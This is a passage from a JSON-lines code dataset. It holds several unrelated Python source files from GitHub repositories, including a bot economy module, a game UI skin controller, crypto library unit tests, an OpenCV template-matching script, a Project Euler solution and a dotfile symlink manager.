None:\n cont[self.user_id]={\"cash\":0, \"bank\":0}\n self.economy.edit(cont)\n \n def get(self, info=None):\n if info is None:\n return self.economy.cont[self.user_id]\n else:\n return self.economy.cont[self.user_id][info]\n \n def edit(self, cash=0, bank=0):\n cont=self.economy.cont\n rcash, rbank=tuple(self.get().values())\n if cash<0 and rcash<-cash:\n raise CashCrisis\n if bank<0 and rbank<-bank:\n raise BankCrisis\n cont[self.user_id]={\n 'cash':rcash+cash,\n 'bank':rbank+bank\n }\n self.economy.edit(cont)\n\ndef Excption(message):\n class E(Exception):\n def __init__(self):\n super().__init__(message)\n return E\n \nBankCrisis=Excption(\"Bank Crisis\")\nCashCrisis=Excption(\"Cash Crisis\")\nclass AmountNotNumeric(Exception):\n def __init__(self):\n super().__init__(\"Amount Not Numeric\")\n\ndef AmtCnv(_type):\n class AmountConverter(commands.Converter):\n \n async def convert(self, ctx, amount):\n if amount in (\"all\", \"max\"):\n eco=Economy(ctx.author.id)\n amount=eco.get(_type)\n elif not amount.isnumeric():\n await ctx.send(\"You need to enter valid amount\")\n return False\n return int(amount)\n return AmountConverter\n \nBAmountConverter=AmtCnv('bank')\nCAmountConverter=AmtCnv('cash')\n","repo_name":"ServerBoys/NoUse_Bot","sub_path":"module/economy_c.py","file_name":"economy_c.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37020120141","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\skins\\controller.py\r\nfrom itertoolsext import first\r\nimport locks\r\nimport uthread\r\nimport signals\r\n\r\nclass SkinPanelAdapter(object):\r\n\r\n def ApplySkin(self, controller, itemID, skin):\r\n uthread.new(self._ApplySkinThread, controller, itemID, skin)\r\n\r\n def _ApplySkinThread(self, controller, itemID, skin):\r\n try:\r\n sm.GetService('skinSvc').ApplySkin2(itemID, skin)\r\n except UserError as e:\r\n if e.msg != 'SkinAlreadyApplied':\r\n controller.OnApplySkinFailed(itemID, skin)\r\n raise\r\n skinID = skin.skinID if skin is not None else None\r\n controller.OnActiveShipSkinChange(itemID, skinID)\r\n except Exception:\r\n controller.OnApplySkinFailed(itemID, skin)\r\n raise\r\n\r\n def GetAppliedSkin(self, itemID, typeID = None):\r\n return sm.GetService('skinSvc').GetAppliedSkin(session.charid, itemID, typeID)\r\n\r\n def GetSkins(self, typeID):\r\n return sm.GetService('skinSvc').GetSkins(typeID)\r\n\r\n def GetTypesForSkin(self, skinID):\r\n skin = sm.GetService('skinSvc').static.GetSkinByID(skinID)\r\n return skin.types\r\n\r\n def RegisterNotify(self, controller):\r\n sm.RegisterNotify(controller)\r\n\r\n def UnregisterNotify(self, controller):\r\n sm.UnregisterNotify(controller)\r\n\r\n\r\nclass SkinPanelController(object):\r\n __notifyevents__ = ['OnSkinLicenseActivated']\r\n\r\n def __init__(self, typeID, adapter = None):\r\n self._adapter = adapter or SkinPanelAdapter()\r\n self._lock = locks.Lock()\r\n self.Reset(typeID)\r\n self.onChange = signals.Signal()\r\n self.onSkinsChange = signals.Signal()\r\n self.onSkinsChange.connect(self.onChange)\r\n self._adapter.RegisterNotify(self)\r\n\r\n def Close(self):\r\n self._adapter.UnregisterNotify(self)\r\n self.onSkinsChange.clear()\r\n self.onChange.clear()\r\n\r\n def Reset(self, typeID):\r\n self._typeID = typeID\r\n self._applied = None\r\n self._previewed = None\r\n self._pending = None\r\n self._skins = None\r\n\r\n @property\r\n def typeID(self):\r\n return self._typeID\r\n\r\n @typeID.setter\r\n def typeID(self, newTypeID):\r\n with self._lock:\r\n self.Reset(newTypeID)\r\n self.onSkinsChange()\r\n\r\n @property\r\n def applied(self):\r\n return self._applied\r\n\r\n @property\r\n def previewed(self):\r\n return self._previewed\r\n\r\n @property\r\n def pending(self):\r\n return self._pending\r\n\r\n @property\r\n def skins(self):\r\n if self._skins is None:\r\n self._skins = self._adapter.GetSkins(self._typeID)\r\n return self._skins\r\n\r\n def PickSkin(self, skin):\r\n with self._lock:\r\n currentID = self._previewed.materialID if self._previewed is not None else None\r\n pickedID = skin.materialID if skin is not None else None\r\n if currentID == pickedID:\r\n skin = None\r\n self._previewed = skin\r\n self.onChange()\r\n\r\n def OnSkinLicenseActivated(self, skinID):\r\n with self._lock:\r\n types = self._adapter.GetTypesForSkin(skinID)\r\n if self._typeID not in types:\r\n return\r\n self._skins = None\r\n self._UpdateActivatedSkin(skinID)\r\n self.onSkinsChange()\r\n\r\n def _UpdateActivatedSkin(self, skinID):\r\n if self._previewed is None:\r\n return\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n if skin.materialID == self._previewed.materialID:\r\n self._previewed = skin\r\n except StopIteration:\r\n pass\r\n\r\n\r\nclass SkinNotAvailableForType(Exception):\r\n pass\r\n\r\n\r\nclass FittingSkinPanelController(SkinPanelController):\r\n __notifyevents__ = SkinPanelController.__notifyevents__ + ['OnActiveShipSkinChange']\r\n\r\n def __init__(self, fitting, adapter = None):\r\n self._fitting = fitting\r\n super(FittingSkinPanelController, self).__init__(typeID=fitting.GetTypeID(), adapter=adapter)\r\n self._UpdateFittingMaterial()\r\n self.onChange.connect(self._UpdateFittingMaterial)\r\n self._fitting.on_new_itemID.connect(self.OnNewItemID)\r\n\r\n def Close(self):\r\n super(FittingSkinPanelController, self).Close()\r\n self._fitting.on_new_itemID.disconnect(self.OnNewItemID)\r\n\r\n @property\r\n def itemID(self):\r\n return self._itemID\r\n\r\n def Reset(self, typeID):\r\n super(FittingSkinPanelController, self).Reset(typeID)\r\n self._itemID = self._fitting.GetItemID()\r\n self._applied = self._adapter.GetAppliedSkin(self._itemID, typeID)\r\n\r\n def PickSkin(self, skin):\r\n itemID = self.itemID\r\n with self._lock:\r\n if skin is not None and skin not in self.skins:\r\n raise SkinNotAvailableForType('%s not found in %s' % (skin, self.skins))\r\n if skin is None:\r\n self._ResetPick(itemID)\r\n elif skin.licensed:\r\n self._PickLicensedSkin(skin, itemID)\r\n else:\r\n self._PickUnlicensedSkin(skin)\r\n\r\n def _ResetPick(self, itemID):\r\n if all((s is None for s in (self._applied, self._pending, self._previewed))):\r\n return\r\n self._applied = None\r\n self._pending = None\r\n self._previewed = None\r\n self._adapter.ApplySkin(self, itemID, None)\r\n self.onChange()\r\n\r\n def _PickLicensedSkin(self, skin, itemID):\r\n if self._applied == skin or self._pending == skin:\r\n skin = None\r\n self._pending = skin\r\n self._applied = None\r\n if skin is not None:\r\n self._previewed = None\r\n self._adapter.ApplySkin(self, itemID, skin)\r\n self.onChange()\r\n\r\n def _PickUnlicensedSkin(self, skin):\r\n if self._previewed == skin:\r\n self._previewed = None\r\n else:\r\n self._previewed = skin\r\n self.onChange()\r\n\r\n def OnActiveShipSkinChange(self, itemID, skinID):\r\n if itemID != self.itemID:\r\n return\r\n with self._lock:\r\n if skinID is None and self._applied is None:\r\n return\r\n if skinID is None:\r\n skin = None\r\n else:\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n except StopIteration:\r\n return\r\n\r\n if self._applied == skin:\r\n return\r\n if self._pending and self._pending.skinID == skin.skinID:\r\n self._pending = None\r\n self._applied = skin\r\n self.onChange()\r\n\r\n def OnNewItemID(self):\r\n self.typeID = self._fitting.GetTypeID()\r\n\r\n def OnApplySkinFailed(self, itemID, skin):\r\n if itemID != self.itemID:\r\n return\r\n with self._lock:\r\n if self._pending == skin:\r\n self._pending = None\r\n self._applied = self._adapter.GetAppliedSkin(itemID)\r\n self.onChange()\r\n\r\n def _UpdateActivatedSkin(self, skinID):\r\n if self._applied is not None and self._applied.skinID == skinID:\r\n self._applied = None\r\n if self._pending is not None and self._pending.skinID == skinID:\r\n self._pending = None\r\n if self._previewed is not None:\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n if self._previewed.materialID == skin.materialID:\r\n self._previewed = None\r\n except StopIteration:\r\n pass\r\n\r\n def _UpdateFittingMaterial(self):\r\n if self._previewed:\r\n materialSetID = self._previewed.materialSetID\r\n elif self._pending:\r\n materialSetID = self._pending.materialSetID\r\n elif self._applied:\r\n materialSetID = self._applied.materialSetID\r\n else:\r\n materialSetID = None\r\n self._fitting.SetSkinMaterialSetID(materialSetID)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/skins/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1459958526","text":"from google.apputils import app\nimport logging\nfrom google.apputils import basetest as googletest\n\nimport ebq_crypto as ecrypto\n\n_KEY1 = '0123456789abcdef'\n_PLAINTEXT1 = 'this is test string one'\n\n\nclass ProbabilisticCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.ProbabilisticCipher(_KEY1)\n\n def testProbabilisticEncryptDecryptUnicodeString(self):\n logging.debug('Running testProbabilisticEncryptDecryptUtf8String method.')\n # test success with different plaintexts\n for plaintext in (u'22', u'this is test string one', u'-1.3', u'5545',\n u\"\"\"this is a longer test string that should go on for\n more than two AES blocks or perhaps many more of them\n also.\"\"\"):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # non string type should raise an error.\n try:\n self.cipher.Encrypt(22)\n self.fail()\n except ValueError:\n pass # success\n\n def testDecryptWhenRaw(self):\n \"\"\"Test Decrypt() in raw mode while passing invalid utf-8 bytes.\"\"\"\n invalid_utf8 = '\\xf0\\xf0\\xf0'\n ciphertext = self.cipher.Encrypt(invalid_utf8)\n plaintext = self.cipher.Decrypt(ciphertext, raw=True)\n self.assertEqual(invalid_utf8, plaintext)\n\n def testDecryptWhenNotRaw(self):\n \"\"\"Test Decrypt() when not in raw mode, which is the default.\"\"\"\n invalid_utf8 = '\\xf0\\xf0\\xf0'\n ciphertext = self.cipher.Encrypt(invalid_utf8)\n # although these bytes were encrypted and returned as ciphertext,\n # attempting to decrypt them (works) and transform them back to\n # unicode via utf-8 decode (raw=False) should fail.\n self.assertRaises(\n UnicodeDecodeError, self.cipher.Decrypt, ciphertext, raw=False)\n\n\nclass PseudonymCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.PseudonymCipher(_KEY1)\n\n def testPseudonymEncryptDecryptUnicodeString(self):\n logging.debug('Running testPseudonymEncryptDecryptUtf8String method.')\n # test success with different plaintexts\n for plaintext in (u'22', u'this is test string one', u'-1.3', u'5545',\n u\"\"\"this is a longer test string that should go on for\n more than two AES blocks or perhaps many more of them\n also.\"\"\"):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # non string type should raise an error.\n try:\n self.cipher.Encrypt(22)\n self.fail()\n except ValueError:\n pass # success\n\n\ndef _GetRandForTesting(size):\n # return some constant of appropriate size\n return size * '1'\n\n\nclass HomomorphicIntCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.HomomorphicIntCipher(_KEY1)\n\n def testHomomorphicEncryptIntDecryptInt(self):\n logging.debug('Running testHomomorphicEncryptIntDecryptInt method.')\n # test success with different plaintexts\n for plaintext in (2, 5, 55, 333333333, 44444444444):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # non int/long type should raise an error.\n try:\n self.cipher.Encrypt('22')\n self.fail()\n except ValueError:\n pass # success\n try:\n self.cipher.Encrypt(22222222222222222222222)\n self.fail()\n except ValueError:\n pass # success\n\n\nclass HomomorphicFloatCipherTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.HomomorphicFloatCipher(_KEY1)\n\n def testHomomorphicEncryptFloatDecryptFloat(self):\n logging.debug('Running testHomomorphicEncryptFloatDecryptFloat method.')\n # test success with different plaintexts\n for plaintext in (1.22, 0.4565, 55.45, 33.3333333, 444444444.44):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # encrypting a too large float should raise an error.\n try:\n self.cipher.Encrypt(1.0*2**400)\n self.fail()\n except ValueError:\n pass # success\n # non int/long type should raise an error.\n try:\n self.cipher.Encrypt('22')\n self.fail()\n except ValueError:\n pass # success\n\n\nclass StringHashTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.hasher = ecrypto.StringHash(_KEY1, 8, 'sha1')\n self.fieldname = u'Description'\n\n def testGetStringKeyHash(self):\n logging.debug('Running testGetStringKeyHash method.')\n hash1 = self.hasher.GetStringKeyHash(self.fieldname, u'school')\n self.assertEqual(12, len(hash1)) # expanded to 8 * 4/3 due to base64\n # check 2nd call to hash gives same output\n hash2 = self.hasher.GetStringKeyHash(self.fieldname, u'school')\n self.assertEqual(hash1, hash2)\n # check different input gives a different hash\n hash3 = self.hasher.GetStringKeyHash(self.fieldname, u'not school')\n self.assertNotEqual(hash1, hash3)\n # check that hash output length can be specified on digest call\n hash4 = self.hasher.GetStringKeyHash(self.fieldname, u'school',\n output_len=33)\n # -- 33*4/3 rounded up to a multiple of 4 for base64 encoding\n self.assertEqual(44, len(hash4))\n # check that another hash function can be specified on digest call\n hash5 = self.hasher.GetStringKeyHash(self.fieldname, u'school',\n output_len=33, hashfunc='sha256')\n self.assertNotEqual(hash4, hash5)\n # check that another outputlen and hashfunc can be set through constructor\n hasher6 = ecrypto.StringHash(_KEY1, 33, 'sha256')\n self.assertEqual(hash5, hasher6.GetStringKeyHash(self.fieldname, u'school'))\n\n def testGetHashessForWordSubsequencesWithIv(self):\n logging.debug('Running testGetHashesForWordSubsequencesWithIv method.')\n text = u'The quick brown fox jumps over the lazy dog'\n hashes1 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, random_permute=False, rand_gen=_GetRandForTesting)\n # hashes1 has 36 words because text has 9 words and there are 35 word\n # subsequences of length 5 or less, and one extra due to pre-pended iv.\n self.assertEqual(36, len(hashes1.split()))\n # For regression testing, below is the expected string.\n self.assertEqual('MTExMTExMTExMTExMTExMQ== r+LnPgD7hZQ= xSqjeTLry4M= '\n 'Nsx9q20oJFk= /xu7ZfpL2B0= +kzAzlhR4Q4= sOKsrKXhkCQ= '\n '8qmxrO4cbSg= 0zvX/8lk2f4= htApcCWILMg= sKK2mV5HpXY= '\n '7pCfT7322NU= j33+LJhZFug= IP1X3g/lPDU= UtP0wX/xX4E= '\n '3a127xbQ5Hg= Kc5wG5S71ac= crqNunt/kdY= y2cx1LMP1Pk= '\n 'GU4VGtrwcmI= QdgK8S91ZIw= wr8+BHzGCzc= KAez7MjDGVo= '\n 'nzHEdXrWRPU= X/zhUoGgoss= 9vOSQpX3CZk= NpU2fSVRlKw= '\n 'FCIrv3nzunI= jrCH4Takl+I= JSs5E/K2Wr8= r+LnPgD7hZQ= '\n 'Xvb827F9rzw= htitZIrHc4w= e+6DbqjmqFU= c2xxyrQH3dU= '\n 'GYmYmk5pI1g=', hashes1)\n # check 2nd call to hash gives same output\n hashes2 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, random_permute=False, rand_gen=_GetRandForTesting)\n self.assertEqual(hashes1, hashes2)\n # check different smaller input (by one word) gives a different hash\n hashes3 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertNotEqual(hashes1, hashes3)\n self.assertEqual(31, len(hashes3.split())) # one extra for IV\n # check that hash output length can be specified on digest call\n # - for 16 bytes length, the b64 encode turns it into 24 bytes.\n hashes4 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], output_len=16, random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertEqual(24, len(hashes4.split()[1])) # skip 0th which is IV\n # check that another hash function can be specified on digest call\n hashes5 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], hashfunc='sha256', random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertNotEqual(hashes1, hashes5)\n # check that another max_sequence_len can be set\n hashes6 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, max_sequence_len=3, random_permute=False)\n self.assertEqual(25, len(hashes6.split())) # one extra for IV\n\n # check hashing of string with punctuations marks.\n # - As in hashes3 above we also skip the first word, the result should be\n # same as hashes3.\n unclean_text = (u'The; quick,,,, BROWN''!\\\"#%&\\'()*,/?@[]{}--___, fox ' +\n u'jUmps. over the lazy dog...')\n hashes_unclean = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, unclean_text[3:], random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertEqual(hashes3, hashes_unclean)\n\n # check hashing with a different separator\n text_slash = u'http://www.google.com/johndoe-inbox'\n hashes_slash = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text_slash, random_permute=False,\n rand_gen=_GetRandForTesting, separator='/')\n self.assertEqual(7, len(hashes_slash.split())) # one extra for IV\n self.assertEqual('MTExMTExMTExMTExMTExMQ== FvAl46zVC9s= tyI89/YsFnI= '\n 'Xx51CZp6Nks= PkkH/6bqWnI= 32+DPg79MK8= 3lESAvKjz84=',\n hashes_slash)\n\n # check empty text, results in just the iv.\n empty_text = u' ;,.'\n hashes_empty = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, empty_text, random_permute=False,\n rand_gen=_GetRandForTesting)\n # - expect base64 encoding of IV of 16 ones.\n self.assertEqual('MTExMTExMTExMTExMTExMQ==', hashes_empty)\n\n\ndef main(_):\n googletest.main()\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"google/encrypted-bigquery-client","sub_path":"src/ebq_crypto_test.py","file_name":"ebq_crypto_test.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"52"} +{"seq_id":"4919591559","text":"# USAGE\n# python find_waldo.py --puzzle puzzle.png --waldo waldo.png\n\n# import the necessary packages\nimport numpy as np\nimport imutils\nimport cv2\n\n# load the puzzle and waldo images\npuzzle = cv2.imread(\"puzzle.png\")\nwaldo = cv2.imread(\"waldo.png\")\n(waldoHeight, waldoWidth) = waldo.shape[:2]\n\n# find the waldo in the puzzle\nresult = cv2.matchTemplate(puzzle, waldo, cv2.TM_CCOEFF)\n(_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)\n\n# grab the bounding box of waldo and extract him from\n# the puzzle image\ntopLeft = maxLoc\nbotRight = (topLeft[0] + waldoWidth, topLeft[1] + waldoHeight)\nroi = puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]\n\n# construct a darkened transparent 'layer' to darken everything\n# in the puzzle except for waldo\nmask = np.zeros(puzzle.shape, dtype = \"uint8\")\npuzzle = cv2.addWeighted(puzzle, 0.25, mask, 0.75, 0)\n\n# put the original waldo back in the image so that he is\n# 'brighter' than the rest of the image\npuzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi\npuzzle=cv2.resize(puzzle, (0,0), fx=0.4, fy=0.4) \n# display the images\ncv2.imshow(\"Puzzle\", puzzle)\ncv2.imshow(\"Waldo\", waldo)\ncv2.waitKey(0)","repo_name":"thiraphong101/lesson-CV2-2-","sub_path":"09_Template Matching/waldo-master/find_waldo.py","file_name":"find_waldo.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33994523811","text":"\"\"\"This solves problem #89 of Project Euler (https://projecteuler.net).\n\nFor a number written in Roman numerals to be considered valid there are basic rules which\nmust be followed. Even though the rules allow some numbers to be expressed in more than one\nway there is always a \"best\" way of writing a particular number.\n\nFor example, it would appear that there are at least six ways of writing the number sixteen:\n\n IIIIIIIIIIIIIIII\n VIIIIIIIIIII\n VVIIIIII\n XIIIIII (valid)\n VVVI\n XVI (valid)\n\nHowever, according to the rules only XIIIIII and XVI are valid, and the last example is\nconsidered to be the most efficient, as it uses the least number of numerals.\n\nThe 11K text file, p089_roman.txt, contains one thousand numbers written in valid,\nbut not necessarily minimal, Roman numerals.\n\nTraditional Roman numerals are made up of the following denominations:\n\n I = 1, V = 5, X = 10, L = 50, C = 100, D = 500, M = 1000\n\n- Numerals must be arranged in descending order of size.\n- M, C, and X cannot be equalled or exceeded by smaller denominations.\n- D, L, and V can each only appear once.\n\nIn addition to the three rules given above, if subtractive combinations are used then the\nfollowing four rules must be followed.\n\n- Only one I, X, and C can be used as the leading numeral in part of a subtractive pair.\n- I can only be placed before V and X.\n- X can only be placed before L and C.\n- C can only be placed before D and M.\n\nIt is also expected, but not required, that higher denominations should be used whenever\npossible.\n\nFind the number of characters saved by writing each of these in their minimal form.\n\nNote: You can assume that all the Roman numerals in the file contain no more than four\nconsecutive identical units.\n\"\"\"\n\nfrom roman_numbers import decimal_to_roman, relaxed_roman_to_decimal\n\nNUMBERS = 'p089_roman.txt'\n\n\ndef read_file(fn):\n with open(fn) as fp:\n numbers = (line.strip() for line in fp.readlines())\n return numbers\n\n\ndef optimized(rn):\n return decimal_to_roman(relaxed_roman_to_decimal(rn))\n\n\ndef attempt():\n numbers = read_file(NUMBERS)\n\n saved_characters = 0\n for roman_number in numbers:\n pre_length = len(roman_number)\n rn = optimized(roman_number)\n post_length = len(rn)\n saved_characters += (pre_length - post_length)\n\n print('Solution =', saved_characters)\n\n\ndef run_application():\n import time\n start = time.time()\n attempt()\n print('Runtime =', time.time() - start, 'seconds')\n\n\nif __name__ == '__main__':\n run_application()\n\n# last line of code\n","repo_name":"techrabbit58/ProjectEuler","sub_path":"problem_0089.py","file_name":"problem_0089.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3424575642","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 00:39:18 2020\n\n@author: nikbakht\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nimport numpy as np\n\nclass Data(Layer):\n def __init__(self,Nap,Nuser, **kwargs):\n super(Data, self).__init__(**kwargs)\n self.EX=100\n self.EY=100\n self.exponent=3.8\n self.shadowing_sigma=0;\n self.Zuser=0;\n self.Zap=1;\n self.Nap=Nap\n self.Nuser=Nuser\n def call(self,batch_num,beta_open_loop=1):\n\n # Xin = tf.zeros([batch_num,2*(self.Nuser+self.Nap)],dtype='float32')\n G = tf.zeros([batch_num,self.Nap,self.Nuser],dtype='float32')\n power_propotional = tf.zeros([batch_num,self.Nap,self.Nuser],dtype='float32')\n # i=0;\n # while i {1}\\n'.format(linkname, target))\n all_link = set(all_link)\n\n with open(linkrec, 'w') as f:\n f.writelines(all_link)\n\ndef do_actions(actions, fake_operate=True):\n def rm(file):\n if fake_operate:\n print('rm ', file)\n else:\n os.system('rm -rf {0}'.format(file))\n\n def link(linkname, target):\n parent_dir = os.path.dirname(os.path.realpath(linkname))\n if fake_operate:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n print('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n print('mkdir -p {0}'.format(parent_dir))\n print('ln -s {0} {1}'.format(target, linkname))\n else:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n os.system('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n os.system('mkdir -p {0}'.format(parent_dir))\n os.system('ln -s {0} {1}'.format(target, linkname))\n write_linkrec(linkname, target)\n\n def linkdir(linkname, target):\n parent_dir = os.path.dirname(os.path.realpath(linkname))\n if fake_operate:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n print('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n print('mkdir -p {0}'.format(parent_dir))\n print('ln -s {0} {1}'.format(target, linkname))\n else:\n if os.path.realpath(linkname) == target:\n return False\n\n if os.path.lexists(linkname):\n postfix = str(datetime.timestamp(datetime.now()))\n os.system('mv {0} {1}'.format(linkname, linkname + '.' + postfix))\n\n os.system('mkdir -p {0}'.format(parent_dir))\n os.system('ln -s {0} {1}'.format(target, linkname))\n write_linkrec(linkname, target)\n\n local_mappings = locals()\n for action in actions:\n cmd_str = action[0].replace('-', '_')\n if cmd_str not in local_mappings:\n cprint('unknown cmd: {0}'.format(cmd_str), color='red')\n continue\n local_mappings[cmd_str](*action[1:])\n\n\ndef remove_broken_symlinks_stack(created_symlinks):\n results = []\n for linkname, dst in created_symlinks.items():\n if os.path.lexists(linkname) \\\n and os.path.islink(linkname) \\\n and os.path.realpath(linkname) == dst \\\n and not os.path.lexists(dst):\n results.append(('rm', linkname))\n return results\n\n\ndef make_symlink_stack(origdir, dstdir, top_level=True):\n results = []\n if dstdir.endswith('/'):\n dstdir = dstdir[:-1]\n if origdir.endswith('/'):\n origdir = origdir[:-1]\n\n if top_level:\n for dirpath, dirnames, targets in os.walk(origdir):\n for dirname in dirnames:\n linkname = dirname\n if not dirname.startswith('.'):\n linkname = '.' + linkname\n dirname = os.path.join(dirpath, dirname)\n linkname = os.path.join(dstdir, linkname)\n results.append(('linkdir', linkname, dirname))\n for target in targets:\n linkname = target\n if not target.startswith('.'):\n linkname = '.' + linkname\n target = os.path.join(dirpath, target)\n linkname = os.path.join(dstdir, linkname)\n results.append(('link', linkname, target))\n break\n else:\n for dirpath, dirnames, targets in os.walk(origdir):\n for target in targets:\n linkname = target\n target = os.path.join(dirpath, target)\n linkdir_name = dirpath[len(origdir)+1:]\n if not linkdir_name.startswith('.'):\n linkdir_name = '.' + linkdir_name\n linkname = os.path.join(linkdir_name, linkname)\n linkname = os.path.join(dstdir, linkname)\n\n results.append(('link', linkname, target))\n\n\n return results\n\n\ndef remove_bad_symlink(linkrec):\n # 删除损坏的链接文件\n if os.path.exists(linkrec):\n with open(linkrec) as f:\n created_links = dict((line.strip().split(' -> ')) for line in f.readlines())\n remove_actions = remove_broken_symlinks_stack(created_links)\n do_actions(remove_actions)\n\nif __name__ == '__main__':\n LINKDOT_DIRNAME = ''\n HOME_PATH = os.environ['HOME']\n BASE_PATH = os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0])))\n LINKDOT_PATH = os.path.join(BASE_PATH, LINKDOT_DIRNAME)\n\n linkrec = os.path.join(BASE_PATH, LINKREC)\n remove_bad_symlink(linkrec)\n actions = make_symlink_stack(LINKDOT_PATH, HOME_PATH)\n do_actions(actions)\n actions = make_symlink_stack(LINKDOT_PATH, HOME_PATH, top_level=False)\n","repo_name":"qytz/oh-my-dot","sub_path":"pylibs/linkdot.py","file_name":"linkdot.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14093349673","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib\n\nfont = {'family' : 'normal', 'weight' : 'normal', 'size' : 13} \nmatplotlib.rc('font', **font)\n\ndata1='model2x2_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata2='model2x2_1x0_l1w5_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata3='model2x2_1x0_l0w1_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\n\ndata4='model1x1_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata5='model1x1_1x0_l1w5_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\ndata6='model1x1_1x0_l0w1_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact.txt'\n\ndata7='model2x2_1x0_l5w200_METRICnorm_Lcoeff_R_uselinear_Lats_ext_DP_noinputact_tanh.txt'\n\npath='../data/data_ADI_NOTgcr_EXP3_Dp_1M10_res05'\nfile_grid = path+'/Precon5_H_exp3_time0_codes_FT_bits52.txt'\nxcoord, ycoord=np.loadtxt( file_grid, usecols=(0,1), unpack=True)\n\nlatitudes=np.zeros(32)\nlatitudes=sorted(set(ycoord), reverse=True)\nprint(latitudes)\n\nplt.ylim(3*10.0**(-5.0), 2*10.0**(-1.0))\nLat1, base1, baseval1, remainder1 =np.loadtxt( \"truth_diff_METRICnorm_iter_1_pseut_Lats.txt\", usecols=(0,1,2,3), unpack=True)\nplt.plot(latitudes, remainder1[0:32]/base1[0:32], label ='Implicit Richardson, Iteration 1')\n\nLat2, base2, remainder2 =np.loadtxt( data1, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L5N200, 5x5, 250 Epochs',color='r', linestyle='dotted')\n\n\nLat2, base2, remainder2 =np.loadtxt( data2, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L1N5, 5x5',color='r', linestyle='--')\nLat2, base2, remainder2 =np.loadtxt( data3, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L0N0, 5x5',color='r', linestyle='-')\n\nLat2, base2, remainder2 =np.loadtxt( 